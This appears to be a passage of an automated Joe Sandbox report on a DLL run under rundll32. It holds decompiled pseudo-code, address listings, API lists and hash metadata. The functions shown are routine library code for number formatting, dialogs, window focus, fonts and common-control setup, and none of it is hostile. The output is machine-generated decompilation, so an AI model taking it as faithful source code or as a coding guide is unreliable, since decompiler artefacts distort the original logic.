									__eflags =  *_t101 - 0x39;
									if( *_t101 == 0x39) {
										 *_t101 = 0x30;
										_t101 = _t101 - 1;
										__eflags = _t101;
										continue;
									}
									break;
								}
								__eflags = _t101 - _t141;
								if(_t101 < _t141) {
									_t101 = _t101 + 1;
									 *_t131 =  *_t131 + 1;
									__eflags =  *_t131;
								}
								 *_t101 =  *_t101 + 1;
								__eflags =  *_t101;
								L46:
								_t103 = _t101 - _t131 - 3;
								__eflags = _t103;
								_t131[1] = _t103;
								 *((char*)( &(_t131[2]) + _t103)) = 0;
								goto L47;
							}
						} else {
							_t152 = _t152 + _t159;
							__eflags = _t152;
							if(_t152 > 0) {
								goto L27;
							} else {
								goto L26;
							}
						}
					} else {
						 *_t131 = 1;
						if(_t151 != 0x80000000 || _a4 != 0) {
							if((_t151 & 0x40000000) != 0) {
								goto L11;
							} else {
								_push("1#SNAN");
								goto L21;
							}
						} else {
							L11:
							__eflags = _t133;
							if(_t133 == 0) {
								L15:
								__eflags = _t151 - 0x80000000;
								if(_t151 != 0x80000000) {
									goto L20;
								} else {
									__eflags = _a4;
									if(_a4 != 0) {
										goto L20;
									} else {
										_push("1#INF");
										goto L18;
									}
								}
							} else {
								__eflags = _t151 - 0xc0000000;
								if(_t151 != 0xc0000000) {
									goto L15;
								} else {
									__eflags = _a4;
									if(_a4 != 0) {
										L20:
										_push("1#QNAN");
										L21:
										_push( &(_t131[2]));
										E10017B90();
										_t131[1] = 6;
									} else {
										_push("1#IND");
										L18:
										_push( &(_t131[2]));
										E10017B90();
										_t131[1] = 5;
									}
								}
							}
						}
						_v48 = _v48 & 0x00000000;
						L47:
						_t105 = _v48;
					}
				} else {
					L26:
					_t131[2] = 0x30;
					L54:
					 *_t131 =  *_t131 & 0x00000000;
					_t131[1] = 0x20;
					_t131[1] = 1;
					_t131[2] = 0;
					_t105 = 1;
				}
				return E100117AE(_t105, _v8);
			}











































                                                                        0x1001bc40
                                                                        0x1001bc45
                                                                        0x1001bc48
                                                                        0x1001bc4c
                                                                        0x1001bc57
                                                                        0x1001bc63
                                                                        0x1001bc67
                                                                        0x1001bc6b
                                                                        0x1001bc6f
                                                                        0x1001bc73
                                                                        0x1001bc77
                                                                        0x1001bc7b
                                                                        0x1001bc7f
                                                                        0x1001bc83
                                                                        0x1001bc87
                                                                        0x1001bc8b
                                                                        0x1001bc8f
                                                                        0x1001bc93
                                                                        0x1001bc9a
                                                                        0x1001bc9c
                                                                        0x1001bca4
                                                                        0x1001bc9e
                                                                        0x1001bc9e
                                                                        0x1001bc9e
                                                                        0x1001bcab
                                                                        0x1001bcae
                                                                        0x1001bcc0
                                                                        0x1001bd3a
                                                                        0x1001bd45
                                                                        0x1001bd62
                                                                        0x1001bd65
                                                                        0x1001bd74
                                                                        0x1001bd78
                                                                        0x1001bd7b
                                                                        0x1001bd80
                                                                        0x1001bd83
                                                                        0x1001bd89
                                                                        0x1001bd93
                                                                        0x1001bd93
                                                                        0x1001bd94
                                                                        0x1001bd9a
                                                                        0x1001bd9b
                                                                        0x1001bd9f
                                                                        0x1001bda2
                                                                        0x1001bda5
                                                                        0x1001bdb9
                                                                        0x1001bdb9
                                                                        0x1001bdbc
                                                                        0x1001bdc0
                                                                        0x1001bdc0
                                                                        0x1001bdc5
                                                                        0x1001bdcb
                                                                        0x1001bdcb
                                                                        0x1001bdcb
                                                                        0x1001bdd0
                                                                        0x1001bdd7
                                                                        0x1001bddb
                                                                        0x1001bde0
                                                                        0x1001bde0
                                                                        0x1001bde0
                                                                        0x1001bde3
                                                                        0x1001bde6
                                                                        0x1001bde8
                                                                        0x1001bdec
                                                                        0x1001bdec
                                                                        0x1001bdf2
                                                                        0x1001bdf4
                                                                        0x1001bdf8
                                                                        0x1001bdfd
                                                                        0x1001bdfd
                                                                        0x1001bdfe
                                                                        0x1001bdf4
                                                                        0x1001bdf2
                                                                        0x1001be01
                                                                        0x1001be01
                                                                        0x1001be04
                                                                        0x1001be06
                                                                        0x1001be09
                                                                        0x1001be0c
                                                                        0x1001be0e
                                                                        0x1001be11
                                                                        0x1001be17
                                                                        0x1001be18
                                                                        0x1001be1d
                                                                        0x1001be1e
                                                                        0x1001be27
                                                                        0x1001be34
                                                                        0x1001be3d
                                                                        0x1001be4a
                                                                        0x1001be4d
                                                                        0x1001be50
                                                                        0x1001be50
                                                                        0x1001be50
                                                                        0x1001be53
                                                                        0x1001be55
                                                                        0x1001be55
                                                                        0x1001be5b
                                                                        0x1001be5b
                                                                        0x1001be5e
                                                                        0x1001be61
                                                                        0x1001be62
                                                                        0x1001be65
                                                                        0x1001be68
                                                                        0x1001bea8
                                                                        0x1001bea8
                                                                        0x1001beaa
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001bea2
                                                                        0x1001bea5
                                                                        0x1001bea7
                                                                        0x1001bea7
                                                                        0x00000000
                                                                        0x1001bea7
                                                                        0x00000000
                                                                        0x1001bea5
                                                                        0x1001beac
                                                                        0x1001beae
                                                                        0x00000000
                                                                        0x1001beb0
                                                                        0x1001beb0
                                                                        0x00000000
                                                                        0x1001beb0
                                                                        0x1001be6a
                                                                        0x1001be75
                                                                        0x1001be75
                                                                        0x1001be77
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001be6c
                                                                        0x1001be6f
                                                                        0x1001be71
                                                                        0x1001be74
                                                                        0x1001be74
                                                                        0x00000000
                                                                        0x1001be74
                                                                        0x00000000
                                                                        0x1001be6f
                                                                        0x1001be79
                                                                        0x1001be7b
                                                                        0x1001be7d
                                                                        0x1001be7e
                                                                        0x1001be7e
                                                                        0x1001be7e
                                                                        0x1001be81
                                                                        0x1001be81
                                                                        0x1001be83
                                                                        0x1001be85
                                                                        0x1001be85
                                                                        0x1001be87
                                                                        0x1001be8d
                                                                        0x00000000
                                                                        0x1001be8d
                                                                        0x1001bda7
                                                                        0x1001bdaa
                                                                        0x1001bdac
                                                                        0x1001bdae
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001bdae
                                                                        0x1001bcc2
                                                                        0x1001bcc9
                                                                        0x1001bcce
                                                                        0x1001bcdc
                                                                        0x00000000
                                                                        0x1001bcde
                                                                        0x1001bcde
                                                                        0x00000000
                                                                        0x1001bcde
                                                                        0x1001bce5
                                                                        0x1001bce5
                                                                        0x1001bce5
                                                                        0x1001bce8
                                                                        0x1001bcff
                                                                        0x1001bcff
                                                                        0x1001bd01
                                                                        0x00000000
                                                                        0x1001bd03
                                                                        0x1001bd03
                                                                        0x1001bd07
                                                                        0x00000000
                                                                        0x1001bd09
                                                                        0x1001bd09
                                                                        0x00000000
                                                                        0x1001bd09
                                                                        0x1001bd07
                                                                        0x1001bcea
                                                                        0x1001bcea
                                                                        0x1001bcf0
                                                                        0x00000000
                                                                        0x1001bcf2
                                                                        0x1001bcf2
                                                                        0x1001bcf6
                                                                        0x1001bd26
                                                                        0x1001bd26
                                                                        0x1001bd2b
                                                                        0x1001bd2e
                                                                        0x1001bd2f
                                                                        0x1001bd34
                                                                        0x1001bcf8
                                                                        0x1001bcf8
                                                                        0x1001bd0e
                                                                        0x1001bd11
                                                                        0x1001bd12
                                                                        0x1001bd17
                                                                        0x1001bd17
                                                                        0x1001bcf6
                                                                        0x1001bcf0
                                                                        0x1001bce8
                                                                        0x1001bd1b
                                                                        0x1001be92
                                                                        0x1001be92
                                                                        0x1001be92
                                                                        0x1001bdb0
                                                                        0x1001bdb0
                                                                        0x1001bdb0
                                                                        0x1001beb3
                                                                        0x1001beb3
                                                                        0x1001beb9
                                                                        0x1001bebd
                                                                        0x1001bec1
                                                                        0x1001bec5
                                                                        0x1001bec5
                                                                        0x1001bea1

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: _strcat$___shr_12
                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN$?
                                                                        • API String ID: 1152255961-4131533671
                                                                        • Opcode ID: 41872633d6340cc6f23dba41c7221c5f3b32f20f70e5c2c0d702b1f865941683
                                                                        • Instruction ID: 0f4b10661b4c6afdc81634f06d58437e80c3cbb5605fe3a4bfa1b348def2c0f3
                                                                        • Opcode Fuzzy Hash: 41872633d6340cc6f23dba41c7221c5f3b32f20f70e5c2c0d702b1f865941683
                                                                        • Instruction Fuzzy Hash: 47810232804A9ACECF01CB68C8847EEBBF4EF15354F0545AAE850DF282E774D685C3A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001F0D1 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 96%
                                                                        			E1001F0D1(intOrPtr* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t67;
				intOrPtr* _t68;
				signed int _t74;
				signed int _t76;
				struct HWND__* _t77;
				signed int _t80;
				int _t96;
				signed int _t97;
				intOrPtr* _t107;
				signed int _t116;
				signed int _t135;
				DLGTEMPLATE* _t136;
				struct HWND__* _t138;
				void* _t139;
				void* _t141;

				_t109 = __ecx;
				E10011BF0(0x1003a3de, _t139);
				_t107 = __ecx;
				 *((intOrPtr*)(_t139 - 0x10)) = _t141 - 0x3c;
				 *((intOrPtr*)(_t139 - 0x20)) = __ecx;
				if( *(_t139 + 0x10) == 0) {
					 *(_t139 + 0x10) =  *(E100373B5() + 0xc);
				}
				_t135 =  *(E100373B5() + 0x1038);
				 *(_t139 - 0x28) = _t135;
				 *(_t139 - 0x14) = 0;
				 *((intOrPtr*)(_t139 - 0x24)) = 0;
				 *(_t139 - 4) = 0;
				E10021D47(_t109, 0x10);
				E10021D47(_t109, 0x7c000);
				if(_t135 == 0) {
					_t136 =  *(_t139 + 8);
					L7:
					__eflags = _t136;
					if(__eflags == 0) {
						L4:
						_t67 = 0;
						L32:
						 *[fs:0x0] =  *((intOrPtr*)(_t139 - 0xc));
						return _t67;
					}
					_t68 = E100243B2();
					_t129 =  *_t68;
					 *((intOrPtr*)(_t139 - 0x1c)) =  *((intOrPtr*)( *_t68 + 0xc))() + 0x10;
					 *(_t139 - 4) = 1;
					 *((intOrPtr*)(_t139 - 0x18)) = 0;
					__eflags = E10024A3D(_t107, 0, __eflags, _t136, _t139 - 0x1c, _t139 - 0x18);
					__eflags =  *0x1004efe4; // 0x0
					_t74 = 0 | __eflags == 0x00000000;
					if(__eflags == 0) {
						L14:
						__eflags = _t74;
						if(_t74 == 0) {
							L17:
							 *(_t107 + 0x40) =  *(_t107 + 0x40) | 0xffffffff;
							 *(_t107 + 0x38) =  *(_t107 + 0x38) | 0x00000010;
							_push(_t107);
							E100237EE();
							_t76 =  *(_t139 + 0xc);
							__eflags = _t76;
							if(_t76 != 0) {
								_t77 =  *(_t76 + 0x1c);
							} else {
								_t77 = 0;
							}
							_t138 = CreateDialogIndirectParamA( *(_t139 + 0x10), _t136, _t77, E1001EB68, 0);
							E100014B0( *((intOrPtr*)(_t139 - 0x1c)) + 0xfffffff0, _t129);
							_t116 =  *(_t139 - 0x28);
							 *(_t139 - 4) =  *(_t139 - 4) | 0xffffffff;
							__eflags = _t116;
							if(_t116 != 0) {
								 *((intOrPtr*)( *_t116 + 0x14))(_t139 - 0x48);
								__eflags = _t138;
								if(_t138 != 0) {
									 *((intOrPtr*)( *_t107 + 0x12c))(0);
								}
							}
							_t80 = E10022196();
							__eflags = _t80;
							if(_t80 == 0) {
								 *((intOrPtr*)( *_t107 + 0x114))();
							}
							__eflags = _t138;
							if(_t138 != 0) {
								__eflags =  *(_t107 + 0x38) & 0x00000010;
								if(( *(_t107 + 0x38) & 0x00000010) == 0) {
									DestroyWindow(_t138);
									_t138 = 0;
									__eflags = 0;
								}
							}
							__eflags =  *(_t139 - 0x14);
							if( *(_t139 - 0x14) != 0) {
								GlobalUnlock( *(_t139 - 0x14));
								GlobalFree( *(_t139 - 0x14));
							}
							__eflags = _t138;
							_t60 = _t138 != 0;
							__eflags = _t60;
							_t67 = 0 | _t60;
							goto L32;
						}
						L15:
						E10024A0E(_t139 - 0x38, _t136);
						 *(_t139 - 4) = 2;
						E10024970(_t107, _t139 - 0x38, 0, _t136,  *((intOrPtr*)(_t139 - 0x18)));
						 *(_t139 - 0x14) = E10024724(_t139 - 0x38);
						 *(_t139 - 4) = 1;
						E10024716(_t139 - 0x38);
						__eflags =  *(_t139 - 0x14);
						if( *(_t139 - 0x14) != 0) {
							_t136 = GlobalLock( *(_t139 - 0x14));
						}
						goto L17;
					}
					__eflags = _t74;
					if(_t74 != 0) {
						goto L15;
					}
					_t96 = GetSystemMetrics(0x2a);
					__eflags = _t96;
					if(_t96 == 0) {
						goto L17;
					}
					_t97 = E10011CB0(_t107, 0,  *((intOrPtr*)(_t139 - 0x1c)), "MS Shell Dlg");
					asm("sbb al, al");
					_t74 =  ~_t97 + 0x00000001 & 0x000000ff;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L17;
					}
					__eflags =  *((short*)(_t139 - 0x18)) - 8;
					if( *((short*)(_t139 - 0x18)) == 8) {
						 *((intOrPtr*)(_t139 - 0x18)) = 0;
					}
					goto L14;
				}
				_push(_t139 - 0x48);
				if( *((intOrPtr*)( *_t107 + 0x12c))() != 0) {
					_t136 =  *((intOrPtr*)( *_t135 + 0x10))(_t139 - 0x48,  *(_t139 + 8));
					goto L7;
				}
				goto L4;
			}





















                                                                        0x1001f0d1
                                                                        0x1001f0d6
                                                                        0x1001f0e6
                                                                        0x1001f0e8
                                                                        0x1001f0eb
                                                                        0x1001f0ee
                                                                        0x1001f0f8
                                                                        0x1001f0f8
                                                                        0x1001f100
                                                                        0x1001f108
                                                                        0x1001f10b
                                                                        0x1001f10e
                                                                        0x1001f111
                                                                        0x1001f114
                                                                        0x1001f11e
                                                                        0x1001f125
                                                                        0x1001f152
                                                                        0x1001f155
                                                                        0x1001f155
                                                                        0x1001f157
                                                                        0x1001f139
                                                                        0x1001f139
                                                                        0x1001f2cd
                                                                        0x1001f2d2
                                                                        0x1001f2db
                                                                        0x1001f2db
                                                                        0x1001f159
                                                                        0x1001f15e
                                                                        0x1001f168
                                                                        0x1001f174
                                                                        0x1001f178
                                                                        0x1001f185
                                                                        0x1001f18a
                                                                        0x1001f190
                                                                        0x1001f192
                                                                        0x1001f1ca
                                                                        0x1001f1ca
                                                                        0x1001f1cc
                                                                        0x1001f20d
                                                                        0x1001f20d
                                                                        0x1001f211
                                                                        0x1001f215
                                                                        0x1001f216
                                                                        0x1001f21b
                                                                        0x1001f21e
                                                                        0x1001f220
                                                                        0x1001f226
                                                                        0x1001f222
                                                                        0x1001f222
                                                                        0x1001f222
                                                                        0x1001f240
                                                                        0x1001f242
                                                                        0x1001f266
                                                                        0x1001f269
                                                                        0x1001f26d
                                                                        0x1001f26f
                                                                        0x1001f277
                                                                        0x1001f27a
                                                                        0x1001f27c
                                                                        0x1001f283
                                                                        0x1001f283
                                                                        0x1001f27c
                                                                        0x1001f289
                                                                        0x1001f28e
                                                                        0x1001f290
                                                                        0x1001f296
                                                                        0x1001f296
                                                                        0x1001f29c
                                                                        0x1001f29e
                                                                        0x1001f2a0
                                                                        0x1001f2a4
                                                                        0x1001f2a7
                                                                        0x1001f2ad
                                                                        0x1001f2ad
                                                                        0x1001f2ad
                                                                        0x1001f2a4
                                                                        0x1001f2af
                                                                        0x1001f2b2
                                                                        0x1001f2b7
                                                                        0x1001f2c0
                                                                        0x1001f2c0
                                                                        0x1001f2c8
                                                                        0x1001f2ca
                                                                        0x1001f2ca
                                                                        0x1001f2ca
                                                                        0x00000000
                                                                        0x1001f2ca
                                                                        0x1001f1ce
                                                                        0x1001f1d2
                                                                        0x1001f1dd
                                                                        0x1001f1e1
                                                                        0x1001f1f1
                                                                        0x1001f1f4
                                                                        0x1001f1f8
                                                                        0x1001f1fd
                                                                        0x1001f200
                                                                        0x1001f20b
                                                                        0x1001f20b
                                                                        0x00000000
                                                                        0x1001f200
                                                                        0x1001f194
                                                                        0x1001f196
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001f19a
                                                                        0x1001f1a0
                                                                        0x1001f1a2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001f1ac
                                                                        0x1001f1b3
                                                                        0x1001f1b7
                                                                        0x1001f1ba
                                                                        0x1001f1be
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001f1c0
                                                                        0x1001f1c5
                                                                        0x1001f1c7
                                                                        0x1001f1c7
                                                                        0x00000000
                                                                        0x1001f1c5
                                                                        0x1001f12c
                                                                        0x1001f137
                                                                        0x1001f14e
                                                                        0x00000000
                                                                        0x1001f14e
                                                                        0x00000000

                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 1001F0D6
                                                                        • GetSystemMetrics.USER32 ref: 1001F19A
                                                                        • GlobalLock.KERNEL32 ref: 1001F205
                                                                        • CreateDialogIndirectParamA.USER32(?,?,?,Function_0001EB68,00000000), ref: 1001F234
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: CreateDialogGlobalH_prologIndirectLockMetricsParamSystem
                                                                        • String ID: MS Shell Dlg
                                                                        • API String ID: 2364537584-76309092
                                                                        • Opcode ID: c69abc20a306ad5bf7d68b9a9b0dbb7d6744ee1315ae104d5c5fc3f7b317a7db
                                                                        • Instruction ID: 46954fd45d3ebabc0cd1c103719a3d91ff65dea30fed852b23a269951fd2c375
                                                                        • Opcode Fuzzy Hash: c69abc20a306ad5bf7d68b9a9b0dbb7d6744ee1315ae104d5c5fc3f7b317a7db
                                                                        • Instruction Fuzzy Hash: A951AE35900209DFCB11DFA4D8859FEBBB5EF54350F21466AF456EB292DB309E80CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10023123 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 68windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 93%
                                                                        			E10023123(void* __ebx, void* __ecx, signed int _a4, long _a8) {
				struct HWND__* _v8;
				void* __ebp;
				void* _t12;
				void* _t14;
				void* _t15;
				void* _t18;
				void* _t19;
				void* _t29;
				struct HWND__* _t30;
				signed int _t34;
				void* _t37;
				void* _t41;
				void* _t44;

				_t29 = __ebx;
				_push(__ecx);
				_t37 = __ecx;
				_t12 = E10023092(__ecx);
				_t34 = _a4 & 0x0000fff0;
				_t41 = _t12;
				_t14 = _t34 - 0xf040;
				if(_t14 == 0) {
					L12:
					if(_a8 != 0x75 || _t41 == 0) {
						L15:
						_t15 = 0;
						goto L16;
					} else {
						E1002040A(_t41);
						L11:
						_t15 = 1;
						L16:
						return _t15;
					}
				}
				_t18 = _t14 - 0x10;
				if(_t18 == 0) {
					goto L12;
				}
				_t19 = _t18 - 0x10;
				if(_t19 == 0 || _t19 == 0xa0) {
					if(_t34 == 0xf060 || _a8 != 0) {
						if(_t41 != 0) {
							_push(_t29);
							_t30 =  *(_t37 + 0x1c);
							_v8 = GetFocus();
							E100220EE(_t44, SetActiveWindow( *(_t41 + 0x1c)));
							SendMessageA( *(_t41 + 0x1c), 0x112, _a4, _a8);
							if(IsWindow(_t30) != 0) {
								SetActiveWindow(_t30);
							}
							if(IsWindow(_v8) != 0) {
								SetFocus(_v8);
							}
						}
					}
					goto L11;
				} else {
					goto L15;
				}
			}
















                                                                        0x10023123
                                                                        0x10023126
                                                                        0x10023129
                                                                        0x1002312b
                                                                        0x10023133
                                                                        0x10023139
                                                                        0x1002313d
                                                                        0x10023142
                                                                        0x100231c9
                                                                        0x100231ce
                                                                        0x100231dd
                                                                        0x100231dd
                                                                        0x00000000
                                                                        0x100231d4
                                                                        0x100231d6
                                                                        0x100231c4
                                                                        0x100231c6
                                                                        0x100231df
                                                                        0x100231e2
                                                                        0x100231e2
                                                                        0x100231ce
                                                                        0x10023148
                                                                        0x1002314b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1002314d
                                                                        0x10023150
                                                                        0x10023163
                                                                        0x1002316d
                                                                        0x1002316f
                                                                        0x10023170
                                                                        0x10023182
                                                                        0x10023188
                                                                        0x1002319b
                                                                        0x100231ac
                                                                        0x100231af
                                                                        0x100231af
                                                                        0x100231b9
                                                                        0x100231be
                                                                        0x100231be
                                                                        0x100231b9
                                                                        0x1002316d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ActiveFocus$MessageSend
                                                                        • String ID: u
                                                                        • API String ID: 1556911595-4067256894
                                                                        • Opcode ID: 7a38ecf18f7e197d870a7535b5f32c12f4dd9d2fa5cbbccc8e8d05b671b4452a
                                                                        • Instruction ID: 4dd9d1b88c5e5c3b3a68c724072b9ea331201f72bd5375ef8a8f6a79988825c8
                                                                        • Opcode Fuzzy Hash: 7a38ecf18f7e197d870a7535b5f32c12f4dd9d2fa5cbbccc8e8d05b671b4452a
                                                                        • Instruction Fuzzy Hash: 53113832A0021DBFDB21DF75EC4595E7BA4EF41390B80C822ED02D61A6DA34ED60CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10024970 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 60COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E10024970(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, short _a4) {
				intOrPtr _v8;
				char _v40;
				void _v68;
				intOrPtr _v72;
				intOrPtr _t14;
				void* _t15;
				int _t24;
				char* _t30;
				struct HDC__* _t32;

				_t14 =  *0x1004c470; // 0x1bfbe703
				_t32 = GetStockObject;
				_t24 = 0xa;
				_v8 = _t14;
				_v72 = __ecx;
				_t30 = "System";
				_t15 = GetStockObject(0x11);
				if(_t15 != 0) {
					L2:
					if(GetObjectA(_t15, 0x3c,  &_v68) != 0) {
						_t30 =  &_v40;
						_t32 = GetDC(0);
						if(_v68 < 0) {
							_v68 =  ~_v68;
						}
						_t24 = MulDiv(_v68, 0x48, GetDeviceCaps(_t32, 0x5a));
						ReleaseDC(0, _t32);
					}
					L6:
					if(_a4 == 0) {
						_a4 = _t24;
					}
					return E100117AE(E10024838(_t24, _v72, _t30, _t32, _t30, _a4), _v8);
				}
				_t15 = GetStockObject(0xd);
				if(_t15 == 0) {
					goto L6;
				}
				goto L2;
			}












                                                                        0x10024976
                                                                        0x1002497d
                                                                        0x10024986
                                                                        0x10024989
                                                                        0x1002498c
                                                                        0x1002498f
                                                                        0x10024994
                                                                        0x10024998
                                                                        0x100249a2
                                                                        0x100249b1
                                                                        0x100249b5
                                                                        0x100249c2
                                                                        0x100249c4
                                                                        0x100249c6
                                                                        0x100249c6
                                                                        0x100249e1
                                                                        0x100249e3
                                                                        0x100249e3
                                                                        0x100249e9
                                                                        0x100249ee
                                                                        0x100249f0
                                                                        0x100249f0
                                                                        0x10024a0b
                                                                        0x10024a0b
                                                                        0x1002499c
                                                                        0x100249a0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000

                                                                        APIs
                                                                        • GetStockObject.GDI32(00000011), ref: 10024994
                                                                        • GetStockObject.GDI32(0000000D), ref: 1002499C
                                                                        • GetObjectA.GDI32(00000000,0000003C,?), ref: 100249A9
                                                                        • GetDC.USER32(00000000), ref: 100249B8
                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 100249CC
                                                                        • MulDiv.KERNEL32(00000000,00000048,00000000), ref: 100249D8
                                                                        • ReleaseDC.USER32 ref: 100249E3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Object$Stock$CapsDeviceRelease
                                                                        • String ID: System
                                                                        • API String ID: 46613423-3470857405
                                                                        • Opcode ID: 663ff432d419aabd0504d210e2fefc42dda8f2058b6cb29df90b3376245dff4c
                                                                        • Instruction ID: 93baf42c8ba0638d3e86fd25d7fd089804823e0dcc4687e6d17ef0450da081f3
                                                                        • Opcode Fuzzy Hash: 663ff432d419aabd0504d210e2fefc42dda8f2058b6cb29df90b3376245dff4c
                                                                        • Instruction Fuzzy Hash: F5114F31A40228EFEB01DBA1DD85FAE7BB8FB45785F410019F605EA191DBB49D42CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1002155E Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 42libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 40%
                                                                        			E1002155E(signed int _a4, signed int _a8) {
				struct HINSTANCE__* _t6;
				_Unknown_base(*)()* _t7;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t14;
				CHAR* _t16;
				signed int _t17;

				_t16 = "COMCTL32.DLL";
				_t14 = GetModuleHandleA(_t16);
				_t6 = LoadLibraryA(_t16);
				_t13 = _t6;
				if(_t13 == 0) {
					return _t6;
				} else {
					_t17 = 0;
					_t7 = GetProcAddress(_t13, "InitCommonControlsEx");
					if(_t7 != 0) {
						_push(_a4);
						if( *_t7() != 0) {
							_t17 = _a4;
							if(_t14 == 0) {
								__imp__#17();
								_t17 = _t17 | 0x00003fc0;
							}
						}
					} else {
						if((_a8 & 0x00003fc0) == _a8) {
							__imp__#17();
							_t17 = 0x3fc0;
						}
					}
					FreeLibrary(_t13);
					return _t17;
				}
			}









                                                                        0x10021561
                                                                        0x1002156e
                                                                        0x10021570
                                                                        0x10021576
                                                                        0x1002157a
                                                                        0x100215d3
                                                                        0x1002157c
                                                                        0x10021582
                                                                        0x10021584
                                                                        0x1002158c
                                                                        0x100215a9
                                                                        0x100215b1
                                                                        0x100215b5
                                                                        0x100215b9
                                                                        0x100215bb
                                                                        0x100215c1
                                                                        0x100215c1
                                                                        0x100215b9
                                                                        0x1002158e
                                                                        0x1002159d
                                                                        0x1002159f
                                                                        0x100215a5
                                                                        0x100215a5
                                                                        0x1002159d
                                                                        0x100215c8
                                                                        0x00000000
                                                                        0x100215ce

                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(COMCTL32.DLL,00008000,00000000,00000400,10021FE1,?,00040000), ref: 10021567
                                                                        • LoadLibraryA.KERNEL32(COMCTL32.DLL), ref: 10021570
                                                                        • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 10021584
                                                                        • #17.COMCTL32 ref: 1002159F
                                                                        • #17.COMCTL32 ref: 100215BB
                                                                        • FreeLibrary.KERNEL32(00000000), ref: 100215C8
                                                                        Strings
                                                                        Memory Dump Source
